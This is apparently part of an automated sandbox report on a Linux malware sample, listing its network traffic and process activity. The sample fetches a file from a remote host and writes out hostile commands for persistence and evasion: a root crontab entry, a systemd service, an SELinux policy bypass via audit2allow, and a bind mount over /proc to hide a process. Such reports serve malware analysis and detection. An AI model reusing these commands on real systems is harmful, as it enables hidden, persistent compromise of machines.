                                                                                                                    Mar 21, 2025 00:09:54.508680105 CET4766853192.168.2.231.1.1.1
                                                                                                                    Mar 21, 2025 00:09:54.597425938 CET53607501.1.1.1192.168.2.23
                                                                                                                    Mar 21, 2025 00:09:54.607717037 CET53476681.1.1.1192.168.2.23
                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                    Mar 21, 2025 00:10:15.030369997 CET192.168.2.1192.168.2.238294(Port unreachable)Destination Unreachable
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Mar 21, 2025 00:09:54.498289108 CET192.168.2.231.1.1.10x3950Standard query (0)www.google.com28IN (0x0001)false
                                                                                                                    Mar 21, 2025 00:09:54.508680105 CET192.168.2.231.1.1.10x7080Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Mar 21, 2025 00:09:54.597425938 CET1.1.1.1192.168.2.230x3950No error (0)www.google.com28IN (0x0001)false
                                                                                                                    Mar 21, 2025 00:09:54.607717037 CET1.1.1.1192.168.2.230x7080No error (0)www.google.com142.250.64.68A (IP address)IN (0x0001)false
                                                                                                                    • 156.225.31.175:808
                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    0192.168.2.2335262156.225.31.175808
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Mar 21, 2025 00:09:55.474982977 CET115INHTTP/1.1 400 Bad Request
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    1192.168.2.2335266156.225.31.175808
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Mar 21, 2025 00:10:14.720705032 CET123OUTGET /password.txt HTTP/1.1
                                                                                                                    Host: 156.225.31.175:808
                                                                                                                    User-Agent: Go-http-client/1.1
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    Mar 21, 2025 00:10:15.009716988 CET213INHTTP/1.1 200 OK
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 16
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Last-Modified: Sat, 21 May 2022 04:57:32 GMT
                                                                                                                    Date: Thu, 20 Mar 2025 23:10:15 GMT
                                                                                                                    Data Raw: cb 5e cf 60 9d e0 4a 51 15 21 27 9b bc c8 4c c8
                                                                                                                    Data Ascii: ^`JQ!'L


                                                                                                                    System Behavior

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:/tmp/linux_386.elf
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:/bin/bash -c /etc/32678&
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:-
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/32678
                                                                                                                    Arguments:/etc/32678
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/32678
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sleep
                                                                                                                    Arguments:sleep 60
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:service crond start
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/basename
                                                                                                                    Arguments:basename /usr/sbin/service
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/basename
                                                                                                                    Arguments:basename /usr/sbin/service
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl --quiet is-active multi-user.target
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:09:54
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:54
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:54
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl list-unit-files --full --type=socket
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:09:54
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:09:54
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sed
                                                                                                                    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                                    File size:121288 bytes
                                                                                                                    MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                                    Start time (UTC):23:10:12
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl start crond.service
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:09:53
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/update-rc.d
                                                                                                                    Arguments:update-rc.d linux_kill defaults
                                                                                                                    File size:3478464 bytes
                                                                                                                    MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                    Start time (UTC):23:09:54
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/update-rc.d
                                                                                                                    Arguments:-
                                                                                                                    File size:3478464 bytes
                                                                                                                    MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                    Start time (UTC):23:09:54
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl daemon-reload
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:09:57
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:09:57
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:09:57
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:-
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:09:57
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl daemon-reload
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:10:01
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:-
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:10:01
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl enable linux.service
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:10:05
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:-
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:10:06
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl start linux.service
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:-
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/journalctl
                                                                                                                    Arguments:journalctl -xe --no-pager
                                                                                                                    File size:80120 bytes
                                                                                                                    MD5 hash:bf3a987344f3bacafc44efd882abda8b

                                                                                                                    Start time (UTC):23:10:26
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:26
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:/bin/bash -c "cd /boot;ausearch -c 'System.img.conf' --raw | audit2allow -M my-Systemimgconf;semodule -X 300 -i my-Systemimgconf.pp"
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:10:27
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:-
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:10:27
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:-
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:10:27
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/bash
                                                                                                                    Arguments:-
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:10:27
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:27
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/bash
                                                                                                                    Arguments:bash -c "echo \"*/1 * * * * root /.img \" >> /etc/crontab"
                                                                                                                    File size:1183448 bytes
                                                                                                                    MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/renice
                                                                                                                    Arguments:renice -20 6235
                                                                                                                    File size:14568 bytes
                                                                                                                    MD5 hash:3686c936ed1df483498266a36871cb5b

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/mount
                                                                                                                    Arguments:mount -o bind /tmp/ /proc/6235
                                                                                                                    File size:55528 bytes
                                                                                                                    MD5 hash:92b20aa8b155ecd3ba9414aa477ef565

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:service cron start
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/basename
                                                                                                                    Arguments:basename /usr/sbin/service
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/basename
                                                                                                                    Arguments:basename /usr/sbin/service
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl --quiet is-active multi-user.target
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:10:29
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:29
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:29
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl list-unit-files --full --type=socket
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:10:29
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:29
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sed
                                                                                                                    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                                    File size:121288 bytes
                                                                                                                    MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                                    Start time (UTC):23:10:33
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl start cron.service
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:10:33
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/tmp/linux_386.elf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:33
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl start crond.service
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:09:56
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/systemd
                                                                                                                    Arguments:-
                                                                                                                    File size:1620224 bytes
                                                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                    Start time (UTC):23:09:56
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                    File size:22760 bytes
                                                                                                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                                    Start time (UTC):23:10:00
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/systemd
                                                                                                                    Arguments:-
                                                                                                                    File size:1620224 bytes
                                                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                    Start time (UTC):23:10:00
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                    File size:22760 bytes
                                                                                                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                                    Start time (UTC):23:10:05
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/systemd
                                                                                                                    Arguments:-
                                                                                                                    File size:1620224 bytes
                                                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                    Start time (UTC):23:10:05
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                    File size:22760 bytes
                                                                                                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                                    Start time (UTC):23:10:07
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/systemd
                                                                                                                    Arguments:-
                                                                                                                    File size:1620224 bytes
                                                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                    Start time (UTC):23:10:07
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/boot/System.img.config
                                                                                                                    Arguments:/boot/System.img.config
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:07
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/boot/System.img.config
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:07
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/pkill
                                                                                                                    Arguments:pkill -9 32678
                                                                                                                    File size:30968 bytes
                                                                                                                    MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/boot/System.img.config
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sh
                                                                                                                    Arguments:sh -c /etc/32678&
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sh
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/32678
                                                                                                                    Arguments:/etc/32678
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/32678
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sleep
                                                                                                                    Arguments:sleep 60
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                                                                    Start time (UTC):23:11:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/32678
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/id.services.conf
                                                                                                                    Arguments:/etc/id.services.conf
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:11:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/id.services.conf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:11:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/pkill
                                                                                                                    Arguments:pkill -9 32678
                                                                                                                    File size:30968 bytes
                                                                                                                    MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/id.services.conf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sh
                                                                                                                    Arguments:sh -c /etc/32678&
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sh
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/32678
                                                                                                                    Arguments:/etc/32678
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/32678
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sleep
                                                                                                                    Arguments:sleep 60
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/id.services.conf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:service crond start
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/basename
                                                                                                                    Arguments:basename /usr/sbin/service
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
